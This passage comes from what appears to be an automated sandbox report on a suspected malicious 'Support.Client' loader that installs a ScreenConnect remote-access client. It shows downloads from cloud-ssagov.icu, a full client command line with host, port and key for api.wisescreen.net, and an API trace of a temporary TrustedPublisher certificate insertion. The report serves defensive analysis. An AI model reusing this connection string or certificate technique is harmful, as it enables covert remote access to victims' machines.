ntialsActionSecurityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogApp
2024-11-13 17:26:59 UTC	2794	IN	Data Raw: 6e 43 6f 6e 6e 65 63 74 20 53 6f 66 74 77 61 72 65 00 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 Data Ascii: nConnect Software SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProces

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49755	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:27:00 UTC	91	OUT	GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:27:00 UTC	235	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 548864 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:59 GMT Connection: close
2024-11-13 17:27:00 UTC	16149	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c b7 8b a9 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 b6 73 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 5d f6 08 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0Xs ]@
2024-11-13 17:27:00 UTC	16384	IN	Data Raw: 73 78 09 00 06 14 28 35 04 00 06 26 2a 1e 02 7b 6e 01 00 0a 2a 22 02 03 7d 6e 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6f 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 48 01 00 0a 0a 02 7b 70 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 70 01 00 0a 06 02 7b 70 01 00 0a fe 01 2a 3e 03 6f 16 07 00 06 04 6f 16 07 00 06 fe 01 2a 3e 02 03 28 71 01 00 0a 02 15 7d 72 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 73 01 00 0a 0a 03 6f 16 07 00 06 02 7b 72 01 00 0a fe 01 06 5f 2c 42 02 7b 74 01 00 0a 8c 81 00 00 1b 2c 18 02 28 75 01 00 0a 02 fe 06 76 01 00 0a 73 77 01 00 0a 28 2c 00 00 2b 26 02 15 7d 72 01 00 0a 02 7c 74 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 16 07 00 06 02 Data Ascii: sx(5&{n"}n:(<(o0(<oH{p-(++,}p{p>oo>(q}r03=-(so{r_,B{t,(uvsw(,+&}r\|t*o
2024-11-13 17:27:00 UTC	16384	IN	Data Raw: 00 07 00 0a 11 00 16 00 00 00 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c8 02 00 0a 0a 2b 30 03 04 73 c9 02 00 0a 0a 2b 26 03 04 73 ca 02 00 0a 0a 2b 1c 03 04 73 96 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b6 00 00 02 14 73 cb 02 00 0a 7a 06 2a 5a d0 8f 00 00 1b 28 3e 01 00 0a 02 28 cc 02 00 0a a5 8f 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a8 0e 00 06 73 cd 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 ce 02 00 0a 2d 0a 12 00 fe 15 8f 00 00 1b 06 2a 00 03 6f 0a 02 00 0a 0a de 07 02 28 2f 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 Data Ascii: :(}+(~+&0TBE +(s+0s+&s+s+rpszZ(>(~%-&~s%(+0%(-o(/
2024-11-13 17:27:00 UTC	16384	IN	Data Raw: 00 00 00 13 30 04 00 32 00 00 00 d4 00 00 11 02 03 6f 3c 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 88 03 00 0a 02 06 17 58 6f f4 02 00 0a 28 59 00 00 2b 73 3b 04 00 0a 2a fe 02 25 2d 06 26 7e 9a 01 00 0a 03 6f 8e 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 ba 0e 00 06 73 a1 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 16 04 00 0a 81 8f 00 00 1b 04 0f 00 28 17 04 00 0a 81 90 00 00 1b 2a 3e 1f fe 73 9b 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3d 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f Data Ascii: 02o<3oXo(Y+s;%-&~o~%-&~s%(+(n(r+n((>s%}s'~%-&Ds=%(+(+(+-j+j(L(+*&f_
2024-11-13 17:27:00 UTC	16384	IN	Data Raw: 00 04 2a 22 02 03 7d 93 02 00 04 2a 1e 02 7b 94 02 00 04 2a 22 02 03 7d 94 02 00 04 2a 1e 02 7b 95 02 00 04 2a 22 02 03 7d 95 02 00 04 2a 00 13 30 04 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 55 07 00 06 28 57 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 57 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 59 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5b 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5d 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5f 07 00 06 28 57 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 61 07 00 06 0b 12 01 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 Data Ascii: "}{"}{"}0%rp%(U(W%rp%(W(%rp%(Y(%r"p%([(%r4p%(](%r2p%(_(W%rHp%(a-oC%rhp
2024-11-13 17:27:00 UTC	16384	IN	Data Raw: 04 04 9a 2c 0d 02 7b d7 03 00 04 04 9a 8e 69 06 2f 0e 02 7b d7 03 00 04 04 06 8d b9 00 00 01 a2 02 7b d7 03 00 04 04 9a 2a 9a 02 02 7b d8 03 00 04 02 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2c 06 00 0a 28 80 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 81 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2f 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 81 01 00 2b 0a 06 07 33 df 2a 56 02 28 37 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3f 0a 00 06 5a 1e 28 19 04 00 06 02 28 40 0a 00 06 58 2a 86 02 Data Ascii: ,{i/{{{(jX}{~,(+0)Q{(-tO\|(+30)Q{(/tO\|(+3V(7}}{{Z(?Z((@X
2024-11-13 17:27:00 UTC	16384	IN	Data Raw: 01 00 11 03 6f 18 07 00 0a 0a 2b 26 06 6f 19 07 00 0a 0b 07 6f 0b 0c 00 06 02 07 04 28 02 0c 00 06 05 07 6f 0a 0c 00 06 28 0b 09 00 06 6f 0d 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 18 07 00 0a 0a 2b 26 06 6f 19 07 00 0a 0b 07 04 07 6f 0b 0c 00 06 02 05 07 6f 0a 0c 00 06 28 0b 09 00 06 6f 0e 0c 00 06 28 03 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b Data Ascii: o+&oo(o(oo-,o290Dyo+&ooo(o(o-,o29(<}=}>}?}@}A{={>{?{
2024-11-13 17:27:00 UTC	16384	IN	Data Raw: 00 06 14 0c 02 7b 31 05 00 04 16 e0 2e 0b 02 7b 31 05 00 04 25 4b 06 58 54 03 06 58 10 01 04 06 59 10 02 02 7b 30 05 00 04 7c 88 00 00 04 06 28 57 03 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 62 01 00 0a 0a 03 04 0e 04 0e 05 06 28 34 02 00 0a 06 2a 1a 73 6c 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ad 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 81 01 00 0a 6f 7d 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 8a 01 00 0a 6f 7d 01 00 0a 2a 2e 73 b6 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 Data Ascii: {1.{1%KXTXY{0\|(W:j*****0iY(b(4slz(<.s2(<2{3oB(<6{o}(<6{o}.s8(<"(]"(c(<*
2024-11-13 17:27:00 UTC	16384	IN	Data Raw: 00 04 2a 32 02 7b 1d 07 00 04 6f 2f 0a 00 0a 2a 22 02 03 7d 1e 07 00 04 2a 32 02 7b 1e 07 00 04 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 46 02 7b 1f 07 00 04 28 57 06 00 06 8c db 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 31 0a 00 0a 16 6f 32 0a 00 0a 2a 36 02 7b 31 0a 00 0a 17 6f 32 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 24 05 00 0a 02 7b 25 05 00 0a 28 33 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 29 05 00 0a 02 7b 2a 05 00 0a 28 33 0a 00 0a 2a 2e 73 0c 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 23 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 10 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 13 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 53 0b 00 06 2a 3a 0f 01 fe 16 4f 01 00 Data Ascii: 2{o/"}2{o0(<F{(W(<6{1o26{1o2(<J{${%(3(<J{){(3.s%(<o#oC.s((<oC.s(<"(S*:O
2024-11-13 17:27:00 UTC	16384	IN	Data Raw: 01 10 00 23 31 00 00 bf 3d 01 00 6d 00 88 01 ef 02 81 01 10 00 1b 32 00 00 bf 3d 01 00 35 00 89 01 f4 02 81 01 10 00 bd 27 00 00 bf 3d 01 00 35 00 8a 01 f5 02 01 00 10 00 3f 31 00 00 bf 3d 01 00 35 00 8b 01 f7 02 01 00 10 00 4c b0 00 00 bf 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 9b 2e 01 00 bf 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 bf 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 bf 3d 01 00 35 00 90 01 04 03 01 01 00 00 b2 6a 01 00 bf 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 bf 3d 01 00 c5 00 96 01 05 03 09 01 10 00 cc 36 01 00 bf 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 7e 50 01 00 bf 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 bf 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 2e 3b 01 00 bf 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 Data Ascii: #1=m2=5'=5?1=5L=E.=mH&=+=5j==6=m~P=mO=m.;=m&

Target ID:	0
Start time:	12:26:32
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\Support.Client (1).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Support.Client (1).exe"
Imagebase:	0x420000
File size:	83'328 bytes
MD5 hash:	EE2FD372B98D7899C7E12D85F4C7F695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:26:32
Start date:	13/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Imagebase:	0x1ec9e060000
File size:	24'856 bytes
MD5 hash:	B4088F44B80D363902E11F897A7BAC09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3530611036.000001ECBA2AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3505558952.000001ECA009A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	12:26:33
Start date:	13/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:27:00
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe"
Imagebase:	0xea0000
File size:	602'392 bytes
MD5 hash:	1778204A8C3BC2B8E5E4194EDBAF7135
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000006.00000000.1922315204.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000006.00000002.1935051701.000000000325F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:27:00
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
Imagebase:	0xb20000
File size:	95'512 bytes
MD5 hash:	75B21D04C69128A7230A0998086B61AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:27:00
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
Imagebase:	0xb20000
File size:	95'512 bytes
MD5 hash:	75B21D04C69128A7230A0998086B61AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:27:02
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "a26a4531-970e-49ee-adc5-025b684e5b57" "User"
Imagebase:	0x620000
File size:	602'392 bytes
MD5 hash:	1778204A8C3BC2B8E5E4194EDBAF7135
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	12:27:13
Start date:	13/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:27:13
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 6884
Imagebase:	0x8e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:27:13
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 320
Imagebase:	0x8e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:28:34
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "a729bf7b-fc8b-4b7f-a944-3b6cfbd7ef10" "System"
Imagebase:	0x950000
File size:	602'392 bytes
MD5 hash:	1778204A8C3BC2B8E5E4194EDBAF7135
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	1456
Total number of Limit Nodes:	4

Executed Functions

Function 00421000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199
encryptionmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000000,00000104), ref: 00421016
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00421025
CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00421032
LocalAlloc.KERNEL32(00000000,00040000), ref: 00421057
LocalAlloc.KERNEL32(00000000,00040000), ref: 00421063
CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00421082
CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 004210B2
LocalAlloc.KERNEL32(00000000,?), ref: 004210C5
LocalAlloc.KERNEL32(00000000,00002000), ref: 004210F4
CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0042110A
CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0042111A
CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0042112D
CertFreeCertificateContext.CRYPT32(00000000), ref: 00421134
LocalFree.KERNEL32(00000000), ref: 0042113E
LocalFree.KERNEL32(00000000), ref: 0042115D
CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0042116E
CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00421182
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00421198
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 004211A9
LoadLibraryA.KERNELBASE(dfshim), ref: 004211BA
GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 004211C6
Sleep.KERNELBASE(00009C40), ref: 004211E8
CertDeleteCertificateFromStore.CRYPT32(?), ref: 0042120B
CertCloseStore.CRYPT32(?,00000000), ref: 0042121A
LocalFree.KERNEL32(?), ref: 00421223
LocalFree.KERNEL32(?), ref: 00421228
LocalFree.KERNEL32(?), ref: 0042122D

Strings

dfshim, xrefs: 004211B5
TrustedPublisher, xrefs: 0042102B
ShOpenVerbApplicationW, xrefs: 004211C0
1.3.6.1.4.1.311.4.1.1, xrefs: 00421193, 004211A4

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
API String ID: 335784236-860318880
Opcode ID: 052706265feca1a896f25ae8b92e34df45c0589c613413ef43ff11723521407e
Instruction ID: 71167392a870423d27f6b46b8e01a92bf55c430c1e72839071f461c199b04ff5
Opcode Fuzzy Hash: 052706265feca1a896f25ae8b92e34df45c0589c613413ef43ff11723521407e
Instruction Fuzzy Hash: B5616071B40218AFEB219F90DC45FAFBBB5EF48B50F540065F615B72A0CB759901CBA8

Non-executed Functions

Function 0042191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0042192B
IsDebuggerPresent.KERNEL32 ref: 004219F7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421A10
UnhandledExceptionFilter.KERNEL32(?), ref: 00421A1A

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
